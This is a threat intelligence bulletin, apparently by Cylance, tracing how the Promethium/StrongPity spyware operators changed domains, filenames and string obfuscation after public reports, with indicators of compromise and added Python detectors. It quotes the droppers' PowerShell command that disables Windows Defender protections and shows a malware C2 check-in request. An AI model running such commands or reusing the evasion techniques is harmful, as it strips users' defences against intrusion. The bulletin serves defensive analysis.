Whack-A-Mole: The Impact of Threat Intelligence on Adversaries

Introduction

One of the great paradoxes in cybersecurity is that as defenders race ahead to identify the next and newest methods of attack, attackers often lag behind and reuse the old and obvious ones with success.

A similar irony haunts threat intelligence research.

Often, when researchers identify and unveil the work of threat groups, the malicious activity exposed disappears from view, and the researchers move on.

The trouble is, the more advanced threat actors often do not. And with more people looking ahead rather than behind, attackers are free to restructure old attacks and resume them.

In this Threat Intelligence Bulletin, Cylance looks back and traces the changes one such threat actor made – the one behind malware known as Promethium or StrongPity – after a number of researchers at different organizations exposed aspects of both their malware toolset as well as their methods of deployment.

Readers of this blog will learn how easy it is for threat actors to change course after the publication of threat intelligence reports and how valuable it can be for researchers, organizations and the public they serve to keep looking back.

Background and Discussion

In March of 2018, researchers at Citizen Lab, an interdisciplinary research institute of the University of Toronto focused on the overlap of technology, human rights, and security, published a lengthy report in their Free Expression Online series called “Bad Traffic.”

Their findings shed light on what they said was the apparent use of Sandvine/Procera Deep Packet Inspection (DPI) hardware to essentially “man-in-the-middle” benign Internet traffic and insert malware known as Promethium (a.k.a. StrongPity) to targeted regions in Turkey and, indirectly, into Syria. They also claimed to uncover the apparent use of these DPI boxes to “covertly raise money through affiliate ads and cryptocurrency mining in Egypt”.

It was a notable report, not just because of its content, but also because it was a good example of the power of a communal effort in public threat intelligence and research. What Citizen Lab did was to effectively synthesize prior findings published by a number of disparate groups about both malware and new delivery methods and put them together with their own original research to yield new insights.

Citizen Lab first drew on 2016 research by Kaspersky Lab into malware called StrongPity – research that was expanded upon later that year by Microsoft, which calls the malware Promethium.

Then Citizen Lab incorporated the findings of researchers at ESET, who noted the apparent use of a Promethium/StrongPity variant being used at the Internet Service Provider (ISP) level in two unnamed countries. Citizen Lab’s research suggested that the countries to which the ESET researchers were referring were in fact Turkey and Egypt.

It should be noted that spokespeople for Sandvine/Procera and their owner Francisco Partners strenuously denied the findings of Citizen Lab. Nevertheless, Citizen Lab’s research, complete with technical indicators of compromise regarding the Promethium malware, resulted in coverage in several media outlets, including the Wall Street Journal as recently as July of this year.

In March, almost immediately upon publication by Citizen Lab, Cylance observed the threat actors behind the malware described in their report change tack. We believe the malware is likely part of yet another commercial (grayware) solution sold to governments and law enforcement agencies, and we have reason to believe it bears a strong connection to a company based in Italy – a lead we hope to investigate in the near future.

Technical Analysis

Two months after the Citizen Lab report, Cylance found new Promethium/StrongPity activity utilizing new infrastructure. The observed domains all appeared to have been registered about two weeks after Citizen Lab’s report. The malware has continued to adapt as new information is published; minimal effort and code changes were all that was required to stay out of the limelight. Cylance observed new domains, new IP addresses, filename changes, and small code obfuscation changes.

In the Citizen Lab report, researchers said that Promethium/StrongPity malware was inserted into Internet traffic after users made legitimate requests for common, often free application installers.

In this latest run, Cylance found the following legitimate installers were targeted by the unknown operators of the malware, many of which are exactly the same as those cited in the original Citizen Lab report:

Host Indicators:

In addition, Cylance observed several new filenames and paths utilized by the latest round of droppers:

• %windows%\system32\IpeOve32.exe
• %temp%\AC315BA-864X-64AA-C23B-C3DDC042AB2\evntwn32.xml
• %temp%\AC315BA-864X-64AA-C23B-C3DDC042AB2\mscorw32.xml
• %windows%\system32\netplviz.exe

The “netplviz.exe” binary is installed as a service with the display name “Advanced User Accounts Control” to maintain persistence on affected systems. Its primary role is to launch the “IpeOve32.exe” binary, which performs the bulk of the malicious actions.

The new droppers additionally take advantage of the following PowerShell command:

powershell.exe Set-MpPreference -ExclusionPath 'C:\Windows\System32', 'C:\Windows\SysWOW64', 'C:\DOCUME~1\<USER>~1\LOCALS~1\Temp' -MAPSReporting 0 -DisableBehaviorMonitoring 1 -SubmitSamplesConsent 2

This command attempts to alter the default behavior of Windows Defender on Windows 10 systems by excluding the system and temp directories as well as turning off sample submission and disabling behavior monitoring. 

We assume this was done in response to Microsoft’s earlier research and as an attempt to keep malicious samples out of the hands of researchers. This type of behavior is relatively unusual, though, and will be a dead giveaway if defenders are monitoring PowerShell usage across their networks.
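The following is an added example of the kind of PowerShell monitoring the paragraph above recommends; it is not Cylance tooling. It parses the parameters of a Set-MpPreference invocation and flags the changes that weaken Windows Defender (broad exclusions, MAPS reporting off, behavior monitoring off, sample submission set to never). The sample records and their field layout are constructed for the example and are not a real event schema; the first record carries the command quoted in the bulletin, the other two are benign.

```python
import re

# Documented Set-MpPreference parameters whose listed values weaken protection
# (MAPSReporting 0 = Disabled; SubmitSamplesConsent 2 = NeverSend).
WEAKENING_VALUES = {
    "disablebehaviormonitoring": {"1", "$true", "true"},
    "disablerealtimemonitoring": {"1", "$true", "true"},
    "mapsreporting": {"0", "disabled"},
    "submitsamplesconsent": {"2", "neversend"},
}
# Exclusion roots that are too broad to be legitimate on an ordinary workstation.
BROAD_EXCLUSIONS = ("\\system32", "\\syswow64", "\\temp")


def parse_mppreference(command):
    """Return {parameter: raw value} for a Set-MpPreference call, or {} if absent."""
    m = re.search(r"Set-MpPreference\b(.*)", command, re.IGNORECASE | re.DOTALL)
    if not m:
        return {}
    params = {}
    # Parameter names start with '-' followed by a letter; path values never do.
    for chunk in re.split(r"\s+-(?=[A-Za-z])", " " + m.group(1)):
        chunk = chunk.strip()
        if chunk:
            name, _, value = chunk.partition(" ")
            params[name.lower()] = value.strip()
    return params


def assess_command(command):
    """List the Defender-weakening changes a command attempts (empty list = benign)."""
    findings = []
    for name, value in parse_mppreference(command).items():
        if name == "exclusionpath":
            for path in (p.strip(" '\"") for p in value.split(",")):
                if any(marker in path.lower() for marker in BROAD_EXCLUSIONS):
                    findings.append(f"broad exclusion: {path}")
        elif name in WEAKENING_VALUES and value.lower() in WEAKENING_VALUES[name]:
            findings.append(f"{name}={value}")
    return findings


# Constructed sample records (assumed layout, not a real event schema).
SAMPLE_LOG = [
    {"host": "WS-0107",
     "script": "powershell.exe Set-MpPreference -ExclusionPath 'C:\\Windows\\System32', "
               "'C:\\Windows\\SysWOW64', 'C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp' "
               "-MAPSReporting 0 -DisableBehaviorMonitoring 1 -SubmitSamplesConsent 2"},
    {"host": "BUILD-02", "script": "Set-MpPreference -ExclusionPath 'D:\\BuildCache'"},
    {"host": "WS-0233", "script": "Get-MpComputerStatus | Select-Object AMRunningMode"},
]


def scan(records):
    """Return {host: findings} for every record whose script weakens Defender."""
    hits = {}
    for rec in records:
        findings = assess_command(rec["script"])
        if findings:
            hits[rec["host"]] = findings
    return hits


if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG).items():
        print(host, "->", "; ".join(findings))
```

The split on `\s+-(?=[A-Za-z])` is deliberate: Windows paths and the numeric values used here never begin with a dash followed by a letter, so it isolates each parameter without a full PowerShell tokenizer. A narrow exclusion such as a build cache produces no finding, which keeps the check usable as an alert rather than an inventory.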

The only major difference Cylance observed in the backdoor involved the encoding methods used for string obfuscation. The group abandoned the previously used configuration files that ESET documented well.

In late March of 2018, the threat actors behind Promethium simply pushed sensitive strings such as C2 domains onto the stack in Unicode. In May, their method evolved: encoded Unicode strings are pushed onto the stack, then each value is XORed against a single-byte key and decremented by one. Both domain names for the malware are stored in this way. In the latest samples Cylance analyzed, the XOR keys 0x45 and 0x25 were used to encode the C2 domains.
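As an added example (not Cylance’s tooling), the decoder below applies the scheme described above, XOR with a single-byte key followed by a subtraction of one, and then brute-forces all 256 keys to recover hostname-looking strings from a blob, which is how an analyst would handle a sample whose key is not yet known. The encoded blobs are constructed here by running the scheme in reverse on two domains and keys quoted in the bulletin; no bytes from an actual sample are reproduced. Applying the transform to every byte of the UTF-16LE encoding, including the zero high bytes, is an assumption of this example.

```python
import re

# Hostname shape; lower-case labels separated by dots.
DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+")


def encode_stack_string(text, key):
    """Reverse of the decoder (used only to build test data): add one, then XOR."""
    return bytes(((b + 1) & 0xFF) ^ key for b in text.encode("utf-16-le"))


def decode_stack_string(blob, key):
    """XOR every byte with the key, subtract one, and read the result as UTF-16LE."""
    raw = bytes(((b ^ key) - 1) & 0xFF for b in blob)
    return raw.decode("utf-16-le", errors="replace")


def recover_domains(blob):
    """Try all single-byte keys; keep (key, text) pairs whose text looks like a hostname."""
    hits = []
    for key in range(256):
        candidate = decode_stack_string(blob, key).rstrip("\x00")
        if DOMAIN_RE.fullmatch(candidate):
            hits.append((key, candidate))
    return hits


# Constructed blobs: domains and keys from the bulletin, bytes generated here.
SAMPLE_BLOBS = {
    "constructed_a": encode_stack_string("ms-sys-security.com", 0x45),
    "constructed_b": encode_stack_string("upd2-app-state.com", 0x25),
}

if __name__ == "__main__":
    for label, blob in SAMPLE_BLOBS.items():
        print(label, blob.hex())
        for key, text in recover_domains(blob):
            print(f"  key=0x{key:02x} -> {text}")
```

Because every ASCII character in UTF-16LE carries a zero high byte, only the correct key turns those high bytes back into zero; every other key yields code points outside the hostname alphabet, so the brute force returns exactly one candidate per blob. The same loop can be pointed at any byte run lifted from a disassembly of the stack pushes.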

Network Indicators:

The malware Cylance observed will communicate over SSL on port 443 using HTTP requests to the C2 server. In the samples we analyzed, the PHP pages were all unique; however, the samples all communicated to one of five domains over TCP port 443:

1. ms-sys-security[.]com
2. svr-sec2-system[.]com
3. upd2-app-state[.]com
4. srv-mx2-cdn-app[.]com
5. system-upload-srv[.]com

The malware utilizes a unique User-Agent string “Edge/8.0 (Windows NT [OS Version Number]; Win[32 or 64]; [Processor Architecture])”. An example check-in POST is presented below:

POST /p5Pss34GvX21pxO0bz25vLqU.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Edge/8.0 (Windows NT 5.1; Win32; x86)
Host: upd2-app-state.com
Content-Length: 25
Connection: Keep-Alive

name=v6_kt38p5_2618871294

Figure 1: Example Initial HTTP POST

To anyone performing SSL traffic inspection this should appear plainly anomalous. The headers “Content-Type” and “Accept” are both repeated due to a programming error and the User-Agent differs substantially from the standard one used by Microsoft’s Edge browser.
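The check described above, written out as an added example rather than anything from the bulletin: a small request parser that reports exactly-repeated header lines and a User-Agent matching the Promethium/StrongPity pattern, with a fallback that catches any string claiming Edge without the Mozilla/5.0 prefix every real Edge build sends. The first sample request is reconstructed from Figure 1; the second is a constructed, representative Edge request used as a benign control.

```python
import re
from collections import Counter

# Reconstructed from Figure 1 above (same headers, same body).
SAMPLE_REQUEST = (
    "POST /p5Pss34GvX21pxO0bz25vLqU.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "User-Agent: Edge/8.0 (Windows NT 5.1; Win32; x86)\r\n"
    "Host: upd2-app-state.com\r\n"
    "Content-Length: 25\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "name=v6_kt38p5_2618871294"
)

# Constructed benign control with a representative EdgeHTML User-Agent.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Shape of the malware's User-Agent as quoted in the bulletin.
PROMETHIUM_UA = re.compile(r"^Edge/8\.0 \(Windows NT [\d.]+; Win(32|64); [^)]+\)$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def check_request(raw):
    """Return a list of anomaly descriptions; an empty list means nothing was flagged."""
    _, headers, _ = parse_request(raw)
    findings = []
    # Identical header lines sent twice point at a hand-rolled HTTP client.
    for (name, value), n in Counter(headers).items():
        if n > 1:
            findings.append(f"header repeated {n}x: {name}: {value}")
    ua = next((v for n, v in headers if n == "user-agent"), "")
    if PROMETHIUM_UA.match(ua):
        findings.append(f"user-agent matches Promethium/StrongPity pattern: {ua}")
    elif "Edge/" in ua and not ua.startswith("Mozilla/5.0"):
        findings.append(f"user-agent claims Edge without the Mozilla/5.0 prefix: {ua}")
    return findings


if __name__ == "__main__":
    for label, req in (("figure 1", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", check_request(req) or "no findings")
```

The duplicate check keys on the full (name, value) pair rather than the name alone because a few fields, Accept among them, may legitimately appear more than once with different values; two byte-identical lines are the programming error the text describes. Both signals are visible only after TLS termination, so this belongs behind an inspecting proxy.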

Conclusion

The group or groups behind Promethium/StrongPity will likely continue to adapt to security publications about them. It’s clear they have significant resources at their disposal and will continue to evolve as necessary. Only minor adjustments are needed to be effective as the information security world constantly shifts its focus to the next big news item.

Defenders and those they serve would do well to think historically and look back more frequently to inspect the “living memory” of threat actor behavior and campaigns in both the target organization’s history as well as that of the larger threat intelligence community.

In this way, defenders can remain attentive to potential threats from behind that they would otherwise have considered “old news” – threats that were done and dealt with by the security community, but which may not be done dealing with their targets.

Appendix

May to August 2018 Updated Activity

SHA256 Hashes:
Trojanized Installers - Droppers
418203a531ceb1f08a21b354bc0d3bf8f157c76b521495c29639d7bffa416b38
61f8dc6d618572a86bd0b646d16186bb6b0fff970947a7df754add4f65ec8625
ae41ba7b4728a6322660443273d7ea6e50c6f804a7d726d0439fac956c7923e7
b14b9c123d19388b81b9ddbb6e7f8807238967db4bd3b8b0be93026a4c7806bb
baafd8f9b5889d49921f5e4c6fc3ca051f42d1c50a6b1db65986bcfb6e10f344
c35a1337f9e0d9ff41800ad5d1925a750813d9e98a13f54e5846426a0a4def8f
42d178417abe68ba9742250ee5eaeb0802e3d0f24c7e585ed200979ed8cd07ea

IpOve32.exe

netplviz.exe
1d0fc58a1167b5d4982c5aba2443a45e26870c51de9621a10f642879b842dac0
35b3eae0eaed90c2f1b4f087aa9f00d5646590fa25d205e2566e3f6e31f757d0
3c6c7a9558ecf7864cf65be5ea08a4a6aa2c2439c956dc988ebb6cf8bc04e272
707ad515c41cd42d696f2d2fb8745af8b36900391db4a477c48f7f75ec4a9c38
7d689fce4d4a8bfb1df041359a3cd4918915a332d11f678039d68f7f6ae5afe5
8f4474b5c3efad963f054f4b18963bf98c3ec746e2ec4c850b0a6196788b2de2
d12b4759bcd3832f76e04f521d5d8829537f008d7bc040c8869474f86fcc2759

C2 Domains:  
dwn-balance[.]net
ms-sys-security[.]com
svr-sec2-system[.]com
upd2-app-state[.]com
srv-mx2-cdn-app[.]com
system-upload-srv[.]com

IP Addresses:
109.201.142[.]122
89.45.67[.]34
46.17.63[.]239
185.193.36[.]109
176.119.28[.]38
151.106.53[.]236

Works Cited

Baumgartner, K. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. Retrieved from https://securelist.com/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/76147/

Kafka, F. (2017, December 8). StrongPity2 spyware replaces FinFisher in MitM campaign – ISP involved? Retrieved from ESET: StrongPity2 spyware replaces FinFisher in MitM campaign – ISP involved?

Marczak, B., Dalek, J., McKune, S., Senft, A., Scott-Railton, J., & Deibert, R. (2018, March 9). BAD TRAFFIC: Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? Retrieved from Citizen Lab: https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved from Microsoft Security Intelligence Report Vol. 21: http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf